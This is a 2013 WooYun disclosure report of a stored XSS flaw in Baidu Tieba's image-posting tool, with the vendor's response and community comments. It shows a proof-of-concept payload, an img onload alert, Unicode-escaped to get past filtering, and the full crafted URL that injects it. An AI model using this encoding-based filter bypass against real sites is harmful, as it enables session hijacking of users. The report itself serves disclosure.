当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026849

漏洞标题:百度贴吧存储型XSS漏洞,可劫持用户身份认证信息。

相关厂商:百度

漏洞作者: q601333824

提交时间:2013-06-25 13:05

修复时间:2013-08-09 13:06

公开时间:2013-08-09 13:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-25: 细节已通知厂商并且等待厂商处理中
2013-06-25: 厂商已经确认,细节仅向厂商公开
2013-07-05: 细节向核心白帽子及相关领域专家公开
2013-07-15: 细节向普通白帽子公开
2013-07-25: 细节向实习白帽子公开
2013-08-09: 细节向公众公开

简要描述:

贴图神器上传存在XSS漏洞

详细说明:

1.先构造代码:  "><img class="BDE_Smiley" src="http://static.tieba.baidu.com/tb/editor/images/face/i_f01.png" pic_ext="png" width="30" height="30" onload="alert(1)"><img src="#" pic_ext="jpeg" onerror="$(&quot;.pic_src_wrapper&quot;).css(&quot;display&quot;,&quot;none&quot;)"><a
2.然后进行转码: \u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0063\u006c\u0061\u0073\u0073\u003d\u0022\u0042\u0044\u0045\u005f\u0053\u006d\u0069\u006c\u0065\u0079\u0022\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u0069\u0063\u002e\u0074\u0069\u0065\u0062\u0061\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0074\u0062\u002f\u0065\u0064\u0069\u0074\u006f\u0072\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0066\u0061\u0063\u0065\u002f\u0069\u005f\u0066\u0030\u0031\u002e\u0070\u006e\u0067\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u0070\u006e\u0067\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0033\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0033\u0030\u0022\u0020\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0023\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u006a\u0070\u0065\u0067\u0022\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0022\u0024\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u002e\u0070\u0069\u0063\u005f\u0073\u0072\u0063\u005f\u0077\u0072\u0061\u0070\u0070\u0065\u0072\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u002e\u0063\u0073\u0073\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0026\u0071\u0075\u006f\u0074\u003b\u002c\u0026\u0071\u0075\u006f\u0074\u003b\u006e\u006f\u006e\u0065\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u0022\u003e\u003c\u0061
3.http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper&pic[0]=http%3A%2F%2Fhimg.bdimg.com%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
 (这个是贴吧神器地址)
4.讲构造好的代码放入&src=连接的后面

QQ截图20130625124654.png


5.得到
http://tieba.baidu.com/photo/shenqi?title=&src=http%3A%2F%2Fwww.baidu.com%2Fp%2F%25E5%258D%2596%25E8%2590%258C%25E7%259A%2584%25E4%25B8%25AD%25E4%25BA%258C%3Ffrom%3Dsuper\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0063\u006c\u0061\u0073\u0073\u003d\u0022\u0042\u0044\u0045\u005f\u0053\u006d\u0069\u006c\u0065\u0079\u0022\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0074\u0061\u0074\u0069\u0063\u002e\u0074\u0069\u0065\u0062\u0061\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0074\u0062\u002f\u0065\u0064\u0069\u0074\u006f\u0072\u002f\u0069\u006d\u0061\u0067\u0065\u0073\u002f\u0066\u0061\u0063\u0065\u002f\u0069\u005f\u0066\u0030\u0031\u002e\u0070\u006e\u0067\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u0070\u006e\u0067\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0033\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0033\u0030\u0022\u0020\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0023\u0022\u0020\u0070\u0069\u0063\u005f\u0065\u0078\u0074\u003d\u0022\u006a\u0070\u0065\u0067\u0022\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0022\u0024\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u002e\u0070\u0069\u0063\u005f\u0073\u0072\u0063\u005f\u0077\u0072\u0061\u0070\u0070\u0065\u0072\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u002e\u0063\u0073\u0073\u0028\u0026\u0071\u0075\u006f\u0074\u003b\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0026\u0071\u0075\u006f\u0074\u003b\u002c\u0026\u0071\u0075\u006f\u0074\u003b\u006e\u006f\u006e\u0065\u0026\u0071\u0075\u006f\u0074\u003b\u0029\u0022\u003e\u003c\u0061
&pic[0]=http%3A%2F%2Fhimg.bdimg.com%2Fsys%2Fportrait%2Fitem%2Fc22ce58d96e8908ce79a84e4b8ade4ba8c0334.jpg
6.然后回复或者发布主题,可以产生XSS

QQ截图20130625124338.png


漏洞证明:

QQ截图20130625124338.png


QQ截图20130625124654.png

修复方案:

过滤符号"\"(能给个邀请码吗)

版权声明:转载请注明来源 q601333824@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-06-25 13:52

厂商回复:

感谢提交,该漏洞我们已内部监控发现,正在处理中。再次感谢您的反馈。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-06-25 13:06 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    卧槽,这个难道是绕过了百度贴吧的过滤机制?洞主牛淫!

  2. 2013-06-25 13:08 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    路人甲永远是那么奇葩

  3. 2013-06-25 14:20 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    。。。劫持信息没啥用,来一句可蠕虫吓吓百度233

  4. 2013-06-25 15:51 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    于是乎 就这样我就得到了梦寐以求的激活码>< 纪念一下

  5. 2013-06-25 17:01 | xcfres54 ( 路人 | Rank:16 漏洞数:3 )

    好流弊的样子。。

  6. 2013-06-26 08:10 | 熊猫 ( 实习白帽子 | Rank:64 漏洞数:33 | panda)

    内部监控发现?

  7. 2013-06-26 10:58 | 天际 ( 路人 | Rank:3 漏洞数:1 | 我只是在打酱油)

    @q601333824 你在卖萌= -!这句话不是我说的么··

  8. 2013-06-29 01:43 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    呵呵

  9. 2013-08-09 13:15 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接 建站、仿站、维护、反黑客、代码审计...)

    感谢提交,该漏洞我们已内部监控发现,就是洞主在构造的过程中发现的吧。

  10. 2013-08-19 04:41 | redcar ( 路人 | Rank:0 漏洞数:1 | 找到组织了!)

    @LaiX 哈哈,有可能。然后度娘就说老娘有流弊的防火墙,然后这个很厉害的rank(洞主自评10,人家都没好意思多要)瞬间就变成1了。

  11. 2013-12-16 18:38 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    @q601333824 能解释一下原理不

  12. 2013-12-17 12:36 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    javascript:void((function(){var e=document.createElement("script");e.setAttribute("id","bdtbmarklet");e.setAttribute("type","text/javascript");e.setAttribute("charset","UTF-8");e.setAttribute("src","http://static.tieba.baidu.com/tb/static-album/lib/bdtbmarklet.js?r="+Math.random()*99999999);document.body.appendChild(e)})()); 贴图神器靠这个脚本执行的....就试试\x22了

  13. 2013-12-17 12:55 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    @q601333824 感谢回复。虽然不是很懂。是因为src属性是js生成的。所以尝试js编码么。

  14. 2014-02-01 10:57 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    呵呵,又他妈内部监控,下回你们内部监控发现我蠕虫再说@xsser

  15. 2014-02-01 12:41 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    @retaker 好赞顶